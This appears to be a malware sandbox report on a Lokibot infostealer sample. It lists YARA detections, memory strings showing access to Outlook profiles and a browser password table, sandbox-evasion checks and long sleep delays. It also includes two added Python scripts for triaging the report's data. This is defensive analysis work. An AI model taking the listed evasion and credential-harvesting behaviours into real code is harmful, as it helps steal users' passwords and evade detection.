              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: PI#53034601506400.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Rule metadata (each matched rule listed once; the per-source lines below reference these names):
Windows_Trojan_Lokibot_1f885282: reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Windows_Trojan_Lokibot_0f421617: reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
SUSP_XORed_URL_in_EXE: date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
INDICATOR_SUSPICIOUS_GENInfoStealer: author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Loki_1: author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Lokibot: hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: 0.2.PI#53034601506400.exe.2575394.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE | Matched rules: SUSP_XORed_URL_in_EXE; INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_GENInfoStealer; Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Loki_1; Lokibot
Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Lokibot
Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Lokibot
Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Lokibot_1f885282; Windows_Trojan_Lokibot_0f421617; Lokibot
Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282
Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617
Source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282
Source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282
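The match listing above is one line per (source, rule) pair, so the same rule metadata is repeated for every dump it fires on. When triaging a report like this it is more useful to pivot the other way: which rules hit which memory regions, and which regions carry the Lokibot-specific rules as opposed to the generic infostealer or XORed-URL heuristics. The script below is an added example, not part of the Joe Sandbox report or of any of the rule authors' tooling. It parses the raw per-match lines exactly as they appear on this page (the source type and "Matched rule" run together by the extraction, e.g. "UNPACKEDPEMatched rule:"), splits the "key = value" metadata while keeping multi-valued fields such as "scan_context = file, memory" intact, and pivots by rule. The five SAMPLE lines are copied from the report; everything else is the example's own code.

```python
"""Pivot Joe Sandbox 'Matched rule' lines by rule and by source (added example)."""
import re
from collections import defaultdict

# Constructed sample: five lines copied from the report above, in the fused form the
# page extraction produced (the type and "Matched rule" run together). Not a full dump.
SAMPLE = """\
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
"""

# The type token is matched lazily so "UNPACKEDPEMatched rule:" splits into
# "UNPACKEDPE" + "Matched rule:"; a separator between them (";", "|", space) is tolerated.
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?), type: (?P<type>[A-Z]+?)[;|\s]*Matched rule: (?P<rule>\S+)\s*(?P<meta>.*)$"
)


def parse_meta(meta: str) -> dict:
    """Split 'k = v, k = v' metadata. Only split on ', ' when a new 'key = ' follows,
    so values that contain commas (scan_context = file, memory) stay whole."""
    out = {}
    if not meta.strip():
        return out
    for part in re.split(r", (?=[A-Za-z_]+ = )", meta):
        key, _, value = part.partition(" = ")
        out[key.strip()] = value.strip()
    return out


def parse_lines(text: str) -> list:
    """One dict per match line; lines that do not look like a match are skipped."""
    matches = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            matches.append({"source": m["src"], "type": m["type"],
                            "rule": m["rule"], "meta": parse_meta(m["meta"])})
    return matches


def pivot_by_rule(matches) -> dict:
    """rule name -> sorted list of sources it fired on."""
    by_rule = defaultdict(set)
    for m in matches:
        by_rule[m["rule"]].add(m["source"])
    return {rule: sorted(srcs) for rule, srcs in by_rule.items()}


def rule_metadata(matches) -> dict:
    """First-seen metadata per rule (Elastic rules carry id / fingerprint / reference_sample)."""
    meta = {}
    for m in matches:
        meta.setdefault(m["rule"], m["meta"])
    return meta


def lokibot_sources(matches, source_type=None) -> list:
    """Sources hit by a rule that names Lokibot in its name, threat_name or description,
    optionally restricted to one source type (UNPACKEDPE, MEMORY, MEMORYSTR)."""
    hits = set()
    for m in matches:
        if source_type and m["type"] != source_type:
            continue
        text = " ".join([m["rule"], m["meta"].get("threat_name", ""),
                         m["meta"].get("description", "")]).lower()
        if "lokibot" in text:
            hits.add(m["source"])
    return sorted(hits)


if __name__ == "__main__":
    ms = parse_lines(SAMPLE)
    for rule, srcs in pivot_by_rule(ms).items():
        print(f"{rule}: {len(srcs)} source(s)")
    print("Lokibot-specific hits in MEMORY dumps:", lokibot_sources(ms, "MEMORY"))
```

Run on the full report the pivot makes the evasion chain visible at a glance: the Lokibot rules fire on the parent's heap dumps (0.2.* unpacks and the 00000000.* sdmp regions) and on the child's image at 00000001.*.0000000000401000, i.e. the payload is carved out in the .NET parent and then lands in the second process's code section.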
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Code function: 0_2_0077E1B8
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Code function: 0_2_0077CD27
Source: PI#53034601506400.exe, 00000000.00000002.328171471.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWebName.dll4 vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.342062577.0000000003736000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMetal.dllJ vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.345925221.0000000007510000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMetal.dllJ vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000000.300607103.0000000000176000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevPnb.exeD vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.326448349.0000000000788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMetal.dllJ vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.345898074.0000000007340000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWebName.dll4 vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.344112204.0000000005A10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs PI#53034601506400.exe
Source: PI#53034601506400.exe, 00000000.00000002.330109817.00000000025C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWebName.dll4 vs PI#53034601506400.exe
Source: PI#53034601506400.exe | Binary or memory string: OriginalFilenamevPnb.exeD vs PI#53034601506400.exe
              Source: PI#53034601506400.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile read: C:\Users\user\Desktop\PI#53034601506400.exe:Zone.IdentifierJump to behavior
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
               Source: unknown, Process created: C:\Users\user\Desktop\PI#53034601506400.exe "C:\Users\user\Desktop\PI#53034601506400.exe"
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Process created: C:\Users\user\Desktop\PI#53034601506400.exe C:\Users\user\Desktop\PI#53034601506400.exe
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Process created: C:\Users\user\Desktop\PI#53034601506400.exe C:\Users\user\Desktop\PI#53034601506400.exe
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI#53034601506400.exe.log
               Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
               Source: PI#53034601506400.exe, 00000001.00000003.324932752.0000000000D57000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
               Source: PI#53034601506400.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
               Source: PI#53034601506400.exe, 00000000.00000003.313997229.0000000005A5F000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: is a registered trademark of Bigelow & Holmes Inc.slnt
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
               Source: PI#53034601506400.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
               Source: PI#53034601506400.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
               Source: PI#53034601506400.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

              Data Obfuscation

               Source: Yara match, File source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE
               Source: Yara match, File source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match, File source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match, File source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match, File source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match, File source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR
               Source: Yara match, File source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTR
               Source: PI#53034601506400.exe, GUI/DangNhap.cs, .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
               Source: 0.0.PI#53034601506400.exe.a0000.0.unpack, GUI/DangNhap.cs, .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
               Source: PI#53034601506400.exe, Static PE information: 0x92744BED [Mon Nov 11 14:25:49 2047 UTC]
               Source: initial sample, Static PE information: section name: .text entropy: 6.8711614725083345
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Process information set: NOOPENFILEERRORBOX
               Source: C:\Users\user\Desktop\PI#53034601506400.exe, Process information set: NOGPFAULTERRORBOX
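The static PE rows in this section carry the values a triage script should turn into findings: a compile timestamp of 0x92744BED that decodes to November 2047, DllCharacteristics of DYNAMIC_BASE, NX_COMPAT, NO_SEH and TERMINAL_SERVER_AWARE, a .text section flagged CODE|EXECUTE|READ with an entropy of 6.87, and a VERSIONINFO OriginalFilename (vPnb.exe) that does not match the name on disk. The Python below is an added example, not Joe Sandbox code and not code from the sample; because the binary itself is not on this page it works from the raw values the report prints rather than parsing a file. Flag names and bit values are those of the PE/COFF specification; the 6.8 entropy threshold and the "any timestamp later than the moment of analysis is bogus" rule are triage heuristics chosen here, not report logic. The trailing byte after each OriginalFilename in the report (vPnb.exeD) is a length prefix from the version resource and is stripped before comparison.

```python
"""Static-PE triage helpers for the values a sandbox report prints.

Added example; not code from Joe Sandbox or from the analysed sample.
Flag names and bits follow the PE/COFF specification. ENTROPY_THRESHOLD
and the future-timestamp rule are heuristics chosen for this example.
"""
import math
from collections import Counter
from datetime import datetime, timedelta, timezone

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE/COFF specification).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# IMAGE_SECTION_HEADER.Characteristics bits that matter for triage.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

ENTROPY_THRESHOLD = 6.8  # heuristic: packed or encrypted code usually sits above this

UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def decode_pe_timestamp(stamp):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, UTC.
    Computed with timedelta so large values work on every platform."""
    return UNIX_EPOCH + timedelta(seconds=stamp)


def timestamp_is_suspicious(stamp, now=None):
    """A compile time later than the analysis time cannot be genuine."""
    now = now or datetime.now(timezone.utc)
    return decode_pe_timestamp(stamp) > now


def decode_dll_characteristics(value):
    """Names of the set DllCharacteristics bits, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def section_is_writable_and_executable(characteristics):
    """W+X sections are a classic self-modifying / unpacking-stub indicator."""
    return bool(characteristics & IMAGE_SCN_MEM_WRITE) and bool(characteristics & IMAGE_SCN_MEM_EXECUTE)


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def original_filename_mismatch(on_disk, version_info_name):
    """True when VERSIONINFO OriginalFilename differs from the on-disk name (case-insensitive)."""
    return on_disk.lower() != version_info_name.lower()


def triage(stamp, dll_chars, text_chars, text_entropy, on_disk, orig_name):
    """Turn the raw static values into a list of human-readable findings."""
    findings = []
    if timestamp_is_suspicious(stamp):
        findings.append("compile timestamp is in the future")
    if "NX_COMPAT" not in decode_dll_characteristics(dll_chars):
        findings.append("DEP opt-out (NX_COMPAT clear)")
    if section_is_writable_and_executable(text_chars):
        findings.append(".text is writable and executable")
    if text_entropy >= ENTROPY_THRESHOLD:
        findings.append("high .text entropy (packed or encrypted payload likely)")
    if original_filename_mismatch(on_disk, orig_name):
        findings.append("OriginalFilename differs from file name on disk")
    return findings


if __name__ == "__main__":
    # Values copied from the report rows above; 0x60000020 is CODE|EXECUTE|READ.
    for line in triage(0x92744BED, 0x8540, 0x60000020, 6.8711614725083345,
                       "PI#53034601506400.exe", "vPnb.exe"):
        print("-", line)
```

Run stand-alone it reports three findings for this sample (future timestamp, high .text entropy, OriginalFilename mismatch) and none for DEP or W+X, which matches the report: the binary opts into NX and ASLR and keeps its own .text read-only, so the obfuscation lives in the Assembly.Load(byte[]) stage rather than in the on-disk section layout.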

              Malware Analysis System Evasion

              Source: Yara matchFile source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239871s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239639s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239532s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239164s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238958s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238619s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238106s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237991s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237842s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237688s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237561s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237427s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237116s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236841s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236688s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -236537s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -236391s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -236249s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -236141s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -236000s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235887s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235766s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235641s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235513s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235391s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235250s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235138s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -235028s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234905s >= -30000s
